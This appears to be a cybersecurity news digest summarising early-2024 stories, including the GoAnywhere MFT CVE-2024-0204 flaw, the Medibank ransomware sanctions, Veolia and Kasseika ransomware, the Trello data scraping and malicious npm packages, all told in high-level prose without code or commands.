Daily Brief

The UK National Cyber Security Centre (NCSC) warns that by 2025, AI could significantly improve state-backed cyber attackers' capabilities by evading current detection systems. Highly capable states could have the data necessary to train AI models for malware development, increasing the potential for new, sophisticated cyber threats. The NCSC forecasts that AI will enhance attackers' abilities to discover vulnerabilities, analyze data in real-time, and identify valuable files for effective data theft or extortion. Predictions suggest that both highly skilled actors and lower-skilled cybercriminals will benefit from AI advancements, with the latter improving their social engineering and ransomware tactics. The report emphasizes the need for continued investment and expertise in AI to keep up with the evolving threat landscape and advises organizations to follow recommended cyber security practices. The upcoming CYBERUK conference will focus on the challenges of emerging technologies like AI and their national security implications, with a call to manage AI’s cyber threat risks responsibly. The NCSC's report follows initiatives such as The Bletchley Declaration from the AI Safety Summit, aimed at managing AI risks, although such agreements lack enforcement mechanisms.

A critical security flaw (CVE-2024-0204) with a 9.8 CVSS score was found in Fortra's GoAnywhere MFT software, allowing unauthorized creation of admin users. Fortra issued an advisory on January 22, 2024, providing guidance for users who cannot immediately upgrade to the patched version 7.4.1. Workarounds involve deleting or replacing the InitialAccountSetup.xhtml file in the software's install directory, depending on the type of deployment. The vulnerability was identified by researchers Mohammed Eldeeb and Islam Elrfai and was caused by a path traversal weakness. Cybersecurity firm Horizon3.ai released a proof-of-concept (PoC) exploit and explained how to detect compromises by checking for new admin users in the GoAnywhere administrator portal. So far, there is no evidence of active exploitation of this particular vulnerability; however, another flaw (CVE-2023-0669) in GoAnywhere MFT was previously leveraged by the Cl0p ransomware group.

Fortra's GoAnywhere Managed File Transfer (MFT) software faced a critical authentication bypass vulnerability allowing creation of new admin users on unpatched systems. Exploit code for the vulnerability (CVE-2024-0204) is now public, enabling attackers to manipulate unpatched instances through the admin portal. While the bug was silently fixed by Fortra on December 7 with the update of GoAnywhere MFT 7.4.1, public disclosure was delayed, with more details provided in a private customer advisory. Security researchers from Horizon3's Attack Team published technical details and a proof-of-concept (PoC) exploit nearly seven weeks after the patch. Clop ransomware gang exploited a different vulnerability in GoAnywhere MFT to breach over 100 organizations, with high-profile victims including Community Health Systems and Procter & Gamble. The current recommendation for admins unable to immediately update is to remove the attack vector as specified by Fortra, while monitoring for any unexpected additions to admin user groups. This incident is part of a broader pattern of cybercriminals targeting MFT platforms over the years.

Australia, the US, and the UK have sanctioned Aleksandr Gennadievich Ermakov for the Medibank ransomware attack. The Medibank breach in October 2022 led to the leak of data for about 10 million individuals, including sensitive health information. Ermakov, associated with multiple online aliases, was identified as a key member of the REvil ransomware group. This trilateral sanction represents the first coordinated action against cybercriminals by the partnering countries. The sanctions aim to disrupt Ermakov's operations by stripping away his financial resources and anonymity, key elements for cybercriminals. Although Ermakov may attempt to evade these sanctions, international authorities hope to deter others from facilitating his illegal activities, including providing ransom payments. Naming and sanctioning Ermakov marks a significant step in the global fight against ransomware and cybercrime, emphasizing the commitment to accountability.

Sanctions have been announced by Australia, USA, and UK against Russian national Aleksandr Gennadievich Ermakov for his involvement in the Medibank ransomware attack. Ermakov, a member of the notorious REvil ransomware group, is believed to be responsible for the 2022 cyberattack on Medibank, a major Australian health insurer. The Medibank breach resulted in the theft and subsequent leakage of sensitive data pertaining to approximately 10 million individuals, including personal and health information. Investigations led to the identification of Ermakov and his online aliases, presenting evidence of his role in the cyber crime. The coordinated sanctions signify a joint effort by the involved nations to deter cybercriminal activities and hold perpetrators accountable. The public exposure of Ermakov's identity aims to disrupt his operations by removing the protective veil of anonymity critical to cybercriminals. Financial sanctions could impede further illicit transactions, including ransomware payments, by criminalizing any transfer of assets to Ermakov. The collaborative international response reflects growing global intolerance toward cybercriminals targeting critical infrastructure and personal data.

Veolia North America, part of the global conglomerate Veolia, has experienced a ransomware attack affecting its Municipal Water division's systems and online bill payment services. The company took immediate defensive actions, temporarily disabling certain systems to prevent further impact and has since restored affected systems and servers. Customers' payments were not affected, and no penalties or interest will apply for late payments during the service disruption; water treatment and wastewater services continued without interruption. A limited number of individuals potentially had their personal information compromised; Veolia is collaborating with law enforcement and cybersecurity experts to evaluate the incident's ramifications. Veolia provides essential services across the U.S. and Canada, treating billions of gallons of water daily; the broader Veolia group serves millions worldwide with water and waste treatment. Similar ransomware attacks have targeted other water service providers, including Southern Water in the UK, prompting cybersecurity agencies to push for enhanced security measures in the water sector. Increasing cyber threats to water infrastructure have led to advisories by CISA and partner agencies, emphasizing the need for robust incident response plans to protect critical utilities.

An exposed API on the project management tool Trello allowed a threat actor to link private email addresses to public Trello profiles. Approximately 15 million Trello users' data has been compromised, with the actor attempting to sell the information online. Trello, owned by Atlassian, claims the data was scraped rather than stolen by unauthorized access to their systems. The threat actor reportedly used a list of 500 million email addresses to query the API, which did not initially require authentication. Proxy servers were used to circumvent Trello's API rate limits, enabling the actor to perform constant queries. Trello has updated the API to prevent unauthenticated requests but maintains functionality for authenticated users. The incident highlights potential risks for targeted phishing attacks and has been added to the Have I Been Pwned breach notification service. It mirrors a similar leak involving a Twitter API bug that linked private contact details to public Twitter profiles.

X, formerly known as Twitter, has rolled out the use of passkeys for iOS user logins in the United States. Passkeys are designed to provide a more secure authentication method, protecting against phishing and unauthorized access by leveraging public key cryptography. The new system does away with the need for passwords, reducing user burden and increasing security. Passkeys will synchronize across iOS devices via iCloud Keychain, ensuring backup in case of a device loss and enabling recovery through iCloud Keychain escrow if all devices are lost. Users can set up a passkey by accessing the security settings on their X account and following a guided process. The move to implement passkeys comes in the wake of several high-profile account hijacks on X, aiming to enhance security and prevent similar incidents. Although highly recommended, the use of passkeys by iOS users in the U.S. is optional and not mandatory at present.

Kasseika ransomware uses a technique called BYOVD to disable antivirus software before file encryption. The ransomware leverages an antivirus driver from TG Soft's VirtIT Agent System to shut down protective measures. Trend Micro analysts noted similarities between Kasseika and the defunct BlackMatter ransomware, suggesting a connection. The attack starts with a phishing email and progresses through credential theft, PsExec tool abuse, and lateral movement within the targeted network. Kasseika terminates crucial processes, including those related to security tools, before executing its encryption routine using ChaCha20 and RSA algorithms. Once files are encrypted, Kasseika issues a ransom note, changes the desktop wallpaper, and demands payment within 72 hours to prevent an increase in ransom amount. After the encryption process, Kasseika attempts to erase its tracks by clearing system event logs. Trend Micro has released indicators of compromise for organizations to detect Kasseika-related activities.

CISA Director Jen Easterly was the victim of a swatting attempt on December 30, at her home following a fake report of a shooting. The dangerous trend of swatting has been targeting politicians, election officials, judges, and even gamers, posing severe risks to the individuals and responding law enforcement officers. In her statement, Easterly emphasized the harassment threat to public officials and pledged CISA’s support to safeguard election officials and the democratic process. Swatting incidents have escalated and been leveraged in extortion attempts, with criminals targeting hospitals and medical clinics, demanding ransoms. The incident was initially reported by local news, with the Arlington County police investigating the hoax 911 call. However, the identity of the perpetrator or motives behind the targeting remains undisclosed. Recent swatting incidents in the US have affected various public figures, including Maine's Secretary of State and individuals related to cases against Donald Trump, highlighting the practice’s increase as the 2024 presidential election approaches.

Jason's Deli has issued a data breach notification alerting customers to a credential stuffing attack. Unauthorized parties accessed customer reward and online account credentials, potentially affecting 344,034 individuals. Attacks on December 21, 2023, utilized login information likely garnered from unrelated previous data breaches. The breach's impact varies based on the personal information customers added to their profiles. Jason's Deli admitted it's unable to assess the full scope of the breach but is informing all potentially affected users. Customers are advised to reset their passwords and are recommended to use unique credentials and 2FA on all platforms. The company has committed to restoring any unauthorized usage of Deli Dollars reward points to ensure customers do not incur losses.

A Baltimore resident, Chouby Charleron, allegedly sold personal data used for financial fraud, potentially facing a 20-year prison sentence. Operating under the alias "The Real Jwet King," Charleron reportedly managed a TLO service in an online chat group, trafficking victims' personally identifiable information (PII). His illicit service mimicked TLOxp, which provides detailed personal data, and was used by criminals for identity theft to procure credit cards fraudulently. The operation unfolded without the use of VPN, leading USPS investigators directly to Charleron's home IP address. Over 5,000 individuals' PII was sold, enabling fraudulent credit card activations and purchases totaling tens of thousands of dollars. Court documents describe cases where Charleron responded rapidly to criminal requests, providing PII within minutes for fraudulent financial activities. Despite an active arrest warrant, Charleron's current custody status is unclear, and he is charged with conspiracy to commit wire fraud, which includes hefty fines and lengthy prison time.

Fortra has issued a warning about a critical authentication bypass vulnerability in GoAnywhere MFT versions prior to 7.4.1. The flaw, tracked as CVE-2024-0204, allows attackers to remotely create new administrative users, gaining full system control. With a CVSS score of 9.8, the vulnerability poses serious risks, including data access, malware introduction, and enabling further network attacks. The issue affects GoAnywhere MFT versions 6.0.1 to 7.4.0, and a fix is available in version 7.4.1, released on December 7, 2023. Fortra has released both patches and manual mitigation recommendations for users to protect against the vulnerability. Previously, the Clop ransomware gang exploited a different flaw in GoAnywhere MFT, resulting in breaches at over 130 organizations. Organizations using GoAnywhere MFT are advised to promptly apply security updates and monitor logs for any signs of compromise.

VexTrio is a substantial cybercrime affiliate program identified by Infoblox, brokering malware for over 60 affiliates including ClearFake and SocGholish. Operative since at least 2017, VexTrio has been involved in distributing malware such as Glupteba through generated domains and compromised websites. In August 2023, VexTrio employed compromised WordPress sites to redirect users to malicious content using a sophisticated DNS-based traffic distribution system (TDS). VexTrio boasts a network of over 70,000 domains managing web traffic for its criminal efforts, using a dual system of HTTP and DNS-based TDS servers. The TDS servers profile site visitors based on attributes like geolocation and browser settings to reroute them to fraudulent sites, filtering non-profitable traffic. Infoblox highlights the operation's complexity and resilience, citing the intertwined affiliate network that has evaded definitive classification for over six years. The affiliate network leverages security vulnerabilities in CMS software, particularly WordPress, to inject malicious JavaScript and propagate nefarious activities.

Two npm packages, warbeast2000 and kodiak2k, were found stealing SSH keys from developers and storing them on GitHub. The packages were downloaded over 1,600 times before npm maintainers removed them. The security firm ReversingLabs identified multiple versions of the malicious packages, indicating an ongoing threat. The postinstallation scripts of these packages could execute additional malicious JavaScript files to access private SSH keys. The kodiak2k package was also seen executing a script capable of launching Mimikatz to extract credentials from memory. This incident highlights the continued risk of malicious software within open source package repositories and the impact on software supply chain security. The report also includes an awareness promotion for a SaaS Security Masterclass webinar derived from insights of a study spanning 493 companies.